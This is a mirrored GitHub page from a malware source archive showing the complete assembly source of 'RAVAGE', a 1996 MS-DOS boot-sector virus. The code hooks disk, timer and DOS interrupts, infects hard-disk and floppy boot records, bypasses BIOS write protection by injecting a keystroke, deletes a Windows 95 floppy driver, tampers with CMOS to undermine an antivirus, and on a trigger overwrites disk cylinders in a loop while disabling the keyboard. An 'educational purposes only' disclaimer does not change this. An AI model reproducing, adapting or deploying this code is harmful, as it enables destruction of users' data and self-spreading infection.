Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 09:52:32 +00:00
Code Releases Activity
6e867b6ce0
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.dodgy.asm
vxunderground dc888afe59
Add files via upload
2021-01-12 17:41:47 -06:00

573 lines
10 KiB
NASM
Raw Blame History

; RAVAGE BSV Written by RP & muRPhy October 1996
; version 9.0 [ New Generation ] -- WIN95 compatible :-)
;
;Replicator module (c) 1994-96 RP, Bucharest
;Tips & tricks (c) 1995-96 muRPhy, Bucharest
;Final version full options Warning!!! Distructive sequence included!
;This source code is for educational purposes only. The author is not
;responsible for any problems caused due to the assembly of this file"
.286
code segment
assume cs:code
org 100h
start:
q db 7b00h dup(90h)
timer equ 08h
jmp begin
bootrecord db 32 dup(0) ;min=32
;............. Entry point ..............................
begin:
push cs
mov di,414h; steal 1k of RAM
pop ds
mov byte ptr ds:[04a1h],0eah ;pun cod de jmp xxxx:xxxx pt INT 40H
dec di ;added code for jmp xxxx:xxxx for INT 40H
dec ds:word ptr[di]
mov ax,ds:word ptr[di]
shl ax,6 ;only >80186
sub ax,07c0h
push ax
push ax
;.......................................................
mov ax,0201h; read the other sector of the virus
push cs
pop es
mov bx,7e00h
mov cx,000fh
cxpar equ this word
mov dx,0080h
dxpar equ this word
int 13h
mov word ptr ds:[offset temp-2],609Ch ;refac cod de pushf pusha
;restoring code for pushf pusha
; mov bx,0100h ;get original INT 40H
mov bh,01 ;bl already 00 from bx=7e00
les ax,[bx]
mov ds:[int40seg],es ;store original INT 40H
mov ds:[int40ofs],ax
;.......................................................
pop ax
mov bx,04a2h ;prepare code at 0:4a1h for jmp xxxx:xxxx
mov [bx],offset int40
mov word ptr [bx+02],ax
mov bx,004ch; get & corrupt int 13h
xchg ds:[bx+2],ax
mov ds:[int13seg],ax
mov ax,offset int13
xchg ds:[bx],ax
mov ds:[int13ofs],ax
;.......................................................
pop es
mov si,7c00h; transfer virus code
mov di,si
cld
xor cx,cx
mov ch,02 ;anti TBAV flag O
rep movsw
cli
mov ax,es ;get & corrupt INT 08H
; mov bx,timer*4
mov bl,timer*4 ;bh already 00 from bx=004ch
xchg ds:[bx+2],ax
mov es:[int08seg],ax
mov ax,offset int08
xchg ds:[bx],ax
mov es:[int08ofs],ax
mov ax,0201h ; fast boot infector sequence
mov dx,0080h
inc cx
int 13h
call testziuaz ; is it trash day ?
cmp dx,0303h
ziuaz equ this word
jnz boot
jmp entry
boot:
int 19h
;------------------- int 40h
jmpint40:
db 0eah
int40ofs dw 0
int40seg dw 0
;----------------- Corrupted entry in INT 40H
int40:
cmp ah,02h
jnz jmpint40
cmp cx,0001
jnz jmpint40
or dh,dh
jnz jmpint40
call disketa
jmp short verificare
;................. jmp int 13 ............................
jmpint13:
db 0eah; jmp xxxx:xxxx
int13ofs dw 0
int13seg dw 0
;...........................................................
cmp03:
cmp ah,03
jne jmpint13
cmp dl,80h
jb jmpint13
jmp short contcmp
;...........................................................
int13: ; FAR PROCEDURE FOR HANDLING INTERRUPT 13H
cmp ah,02h
jnz cmp03
;---
cmp dl,80h ;pe HDD
jb contcmp
or dh,dh ;head 0?
jnz contcmp
cmp cx,000eh ;se redirecteaza 14 si 15 pe 13 presupus cu zerouri
jz fak ;sau cu orice altceva
cmp cx,000fh ;show instead of sectors 14 and 15 , sector 13
jnz contcmp ;sector 13 supposed zeroed or whatever
;not quite good implemented but works anyway
fak:
mov cl,0dh
jmp jmpint13
;---
contcmp:
cmp cx,0001
jnz jmpint13
or dh,dh; <=> cmp dh,00
jnz jmpint13
cmp dl,80h
jae hard
call disketa
jmp short verificare
hard:
call callint13; it was requested a read action for the boot
verificare:
jc giveup
cmp es:word ptr[bx+1bch],0202h; is it infected?
jz showboot
call compute
mov ax,0301h; write real boot on computed sector
call callint13
jnc continue
clearerr:
clc
giveup:
retf 0002
showboot:
call compute
mov ax,0201h
call callint13
jmp short giveup
;-------------------------
continue:
push es
push bx
push cs
pop es
mov ax,0301h; write the other sector of the virus
inc cx
mov cs:[offset cxpar-2],cx
mov cs:[offset dxpar-2],dx
mov bx,7e00h
call callint13
pop bx
pop es
jc clearerr
push es
push bx
push ds
push si
push di
push es
pop ds
push cs
pop es
mov si,bx
add si,1beh; copy the partition into the virus code
mov di,7dbeh
mov cl,21h
cld
rep movsw
mov si,bx; copy the boot record into the virus code
add si,3
mov di,7c03h
mov cl,16
rep movsw
cmp dl,80h
jb normal
;-----
pusha
mov ah,05; bypass BIOS protection;place Y into keyboard buffer.
mov cl,59h
int 16h
call resetcmosflag
inc cs:word ptr [counter]
call testziuaz
mov al,dh
cmp al,09h
ja maimare ;"maimare " means "greater than"
add al,12h ;in Romanian language, of course...
daa
maimare:
sub al,09h
das
mov dh,al
mov cs:word ptr [offset ziuaz-2],dx
popa
;-----
normal:
inc cx ;salvez cx=0000 cu pusha dupa rep movsw =>cx=0001
;cx=0000 saved by pusha after rep movsw =>cx=0001
iar:
mov ax,0301h; write the virus onto the disk
mov bx,7c00h
xor dh,dh
call callint13
jc iar
call resetkeyboard
afar:
pop di
pop si
pop ds
pop bx
pop es
jmp giveup
disketa:
pushf
call cs:dword ptr [int40ofs]
ret
counter dw 0
virsign dw 0202h
partition1 db 80h,01h,01,00,06,0eh,201,231,11h,0,0,0,07,228,03,00
;take care (this is my partition)
;you'll have to change this with yours
db 30h dup (0)
db 55h,0aah
;............ Second sector ..............................
int2f: ;FAR PROCEDURE FOR HANDLING INTERRUPT 2FH
pushf
pusha
push ds
push es
xor bx,bx
mov ds,bx
mov bx,07b4h
cmp ax,1605h ;is it Init Windows ?
jne cont2f
mov ax,cs:[int13ofs] ;restore original handler of INT 13H
mov ds:[bx],ax
mov ds:[bx+0806h-07b4h],ax
mov ax,cs:[int13seg]
mov ds:[bx+2],ax
mov ds:[bx+2+0806h-07b4h],ax
mov ah,62h ;Get Active PSP segment
int 21h
mov ds,bx
mov ax,ds:[002ch] ;Get environment segment
mov es,ax
xor di,di
cld
mov cx,0050h
mov al,'o'
repnz scasb
cmp es:[di],'to' ; winbootdir?
jnz jmpint2f
add di,+06
push es
pop ds
mov dl,ds:[di]
sub dl,'C'-2
mov ah,0eh
int 21h
push di
pop dx
mov ah,3bh ;Change Directory to folder of WIN95
int 21h ;
; apelul windows de genul:
; win setup.exe nu se va realiza cum trebuie
;
;I guess if someone'll run something like
;win setup.exe worse things'll happen
;doesn't matter anyway (few of them will
;run win in this way)
push cs
pop ds
mov ah,41h ; Unlink ds:dx
mov dx,offset floppydriver
int 21h ;ideal ar fi sa nu dea eroare AX=1606h
;here I suppose AX will differ from 1606h
;more than that...I'm sure AX <> 1606h
cont2f:
cmp ax,1606h ;is it Exit Windows?
jne jmpint2f
mov ax,offset int13 ;corrupt again handler of INT 13H
mov ds:[bx],ax
mov ds:[bx+0806h-07b4h],ax
mov ds:[bx+2],cs
mov ds:[bx+2+0806h-07b4h],cs
cmp byte ptr ds:[04a6h],0DAH ;is flag set ?
jz entry
jmpint2f:
pop es
pop ds
popa
popf
db 0eah; jmp xxxx:xxxx
int2fofs dw 0
int2fseg dw 0
;----------------------------------
entry:
push cs
pop ds
mov si,offset txt-1
video:
mov ax,0010h
int 10h
mov ah,0eh
mov bl,0ah
repeta:
std
lodsb
cmp al,'$'
jz distroi
int 10h
jmp short repeta
distroi:
mov cx,0001h
destroyagain:
mov ax,030eh
mov dx,0180h
call callint13
call resetcmosflag
in al,21h ;disable keyboard
or al,02
out 21h,al
inc ch
jnz destroyagain ;
add cl,40h ;for all existing cylinders > 256
jmp short destroyagain
;..........................INT 21H
int21:
pushf
pusha
push ds
push es
mov di,dx
xor ah,4bh
jnz oldint21
push ds
pop es
xor al,al
cld
mov cl,0ffh
repnz scasb
std
mov al,'\'
repnz scasb
mov ax,ds:[di+02]
and ax,0dfdfh
cmp ax,'AR'
jnz oldint21
mov ah,ds:[di+04]
and ah,0dfh
cmp ah,'V'
jnz oldint21
mov al,01
out 70h,al
in al,71h
cmp al,126 ;max value for counter
jne ravnormal
mov ax,1600h ;checking Win active
int 2fh
or al,al
jz entry ;al=0 means Win not active
xor ax,ax
mov ds,ax
mov byte ptr ds:[04a6h],0DAh ;set flag on low memory
jmp short oldint21
;------------------------
ravnormal:
inc ax
push ax
mov al,01
out 70h,al
pop ax
out 71h,al
oldint21:
pop es
pop ds
popa
popf
db 0eah; JMP xxxx:xxxx
int21ofs dw 0
int21seg dw 0
;............... INT 08H .......................................
int08:
pushf
pusha
temp equ this word
push es
push ds
xor di,di ;DI=0000h
mov ds,di ;DS=0000h
mov ax,0b8ah
mov es,ax
cld
mov ax,'EP'
mov cx,0ffffh ;"cautare" means "searching"
;for those of you who don't speak
; Romanian language ;-)
cautare:
repnz scasw
or cx,cx
jz notyet
cmp es:[di],'=C'
jnz cautare
push cs
pop ax ; ax =residseg
mov di,02fh*4 ;Save segment INT 2Fh
xchg [di+02],ax ;Corrupt segment 2FH
mov cs:[int2fseg],ax
mov ax,offset int2f ;Save & corrupt offset INT 2FH
xchg [di],ax
mov cs:[int2fofs],ax
push cs
pop ax
mov di,021h*4 ;Save segment INT 21h
xchg [di+02],ax ;Corrupt segment 21H
mov cs:[int21seg],ax
mov ax,offset int21 ;Save & corrupt offset INT 21H
xchg [di],ax
mov cs:[int21ofs],ax
;Command.com alocat
inc word ptr ds:[0413h] ;refac la 0:413h
;restoring 0:413h
mov bx,0100h
mov word ptr ds:[bx],04a1h ;corrupt INT 40 to point 0:04a1h
mov word ptr ds:[bx+02],0 ;to a jmp far code
mov word ptr cs:[offset temp-2],[(offset peste)-(offset temp)] shl 8+ 0ebh
; dezactiveaza rutina de pe system timer (INT 08H)
; disabling (handler) routine for INT 08H
notyet:
pop ds
pop es
popa
popf
peste equ this word
db 0eah
int08ofs dw 0
int08seg dw 0
floppydriver db 'system\iosubsys\hsflop.pdr',0
testziuaz:
mov ah,04
int 1ah
cmp dl,28h
jbe nochange
mov dl,28h
nochange:
ret
callint13:
pushf
call cs:dword ptr[int13ofs]
ret
resetcmosflag:
mov al,01
out 70h,al
mov al,100 ;set counter in CMOS for RAV
out 71h,al ; RAV stands for Romanian AntiVirus
ret ;an AV prog from ROMANIA
compute:
mov cl,14
cmp dl,80h
jae back
mov dh,1
mov al,es:byte ptr[bx+15h]
cmp al,240; f0h 1.44 disk
je back
mov cl,3
back:
ret
resetkeyboard:
cmp dl,80h
jb nu
xor bx,bx
mov ds,bx
mov bl,1eh
mov ds:[041ah],bx
mov ds:[041ch],bx
nu:
ret
; '$RAVage is wiping data! RP&muRPhy '
text db '$yhPRum&PR !atad gnipiw si egaVAR'
txt equ this word
code ends
end start
muRPhy (c)96
View Git Blame Copy Permalink